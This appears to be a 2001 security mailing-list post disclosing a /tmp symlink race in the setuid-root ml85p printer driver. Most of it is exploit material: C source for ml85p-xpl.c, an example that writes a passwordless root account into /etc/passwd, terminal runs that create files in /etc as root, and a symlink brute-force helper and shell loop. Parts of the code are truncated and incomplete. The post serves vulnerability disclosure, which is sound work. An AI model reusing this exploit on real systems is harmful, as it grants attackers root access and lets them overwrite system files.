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Re: ml85p - driver for Samsung ML-85G and /tmp

From: Charles Stevenson <core () ezlink com>
Date: Tue, 10 Jul 2001 12:18:17 -0600

Hey kev...

I downloaded the source for this and have it compiled... 

Check this out

[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned by_core
ml85p-xpl.c by core (c) 2001
backing up /etc/rc.owned to /tmp/ez.TMwyqr
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or
creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
-rw-rw-r--    1 root     staff           0 Jul 10 12:16 /etc/rc.owned
cleaning up
All done. Enjoy!

Wanna play with it a bit more but we should publish it to bugtraq soon.

/* ml85p-xpl.c
 * Quick hack to exploit ml85p
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 * Example:
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash
 * Then login as owned... etc..
 * by Charles Stevenson <core () ezlink com>
 * July 10 2001
 * shoutz b10z

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   if (argc < 3){

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */
      sprintf(temp, "/tmp/ml85g%d", the_time+i);
      symlink(argv[1], temp);

   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p
-sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){

   sprintf(temp, "/bin/ls -l %s", argv[1]);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;

void usage(char *name){
   fprintf(stderr, "usage: %s <filename> <data>\n", name);

/* EOF */

Best Regards,
Charles Stevenson

(b10z ownz :)

[401070dd] iopl(0x3)                    = 0
[400cf2bd] time(NULL)                   = 994462668
[40100cbf] brk(0)                       = 0x8064544
[40100cbf] brk(0x80646c4)               = 0x80646c4
[40100cbf] brk(0x8065000)               = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

I might have to hack the code to get that far since I dont have the

I am not sure what other OS's pick for permissions by defualt...
mandrake seems to not allow user access by default ... I don't know
what group you need to have access to use this feature.

You can change the umask.
[d0tslash@linux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied

[d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

for shits and giggles lets see what happens if its got bad perms.
[root@linux exp]# chmod 4755 /usr/bin/ml85p

If it's installed from the tarball the perms are ok for sploitin'

[-(core@devastator:~/bleedingedge/ml85p-driver)> ls -l `which ml85p`
-r-sr-sr-x    1 root     staff       11196 Jul 10 11:25
in which case the results are as follows

[d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609

[d0tslash@linux d0tslash]$ cat ml85p-exp.c
// ln -s /etc/oops /tmp/ml85`./ml85p-exp`

#include <time.h>
#include <stdio.h>
int main(int argc,char **argv)
int x = time(NULL);
x = x + 30;
printf("%i\n", x);

[d0tslash@linux d0tslash]$ cat
# krfinisterre () checkfree com
echo " <low> <hi>"
while [ $L -lt $H ]
        ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
        let L=L+1

the following file is created.
-rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops

not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to 
owned::0:0:root:/root:/bin/bash  to this driver and it may append it to the file in /tmp... I am not sure though... 
just an idea

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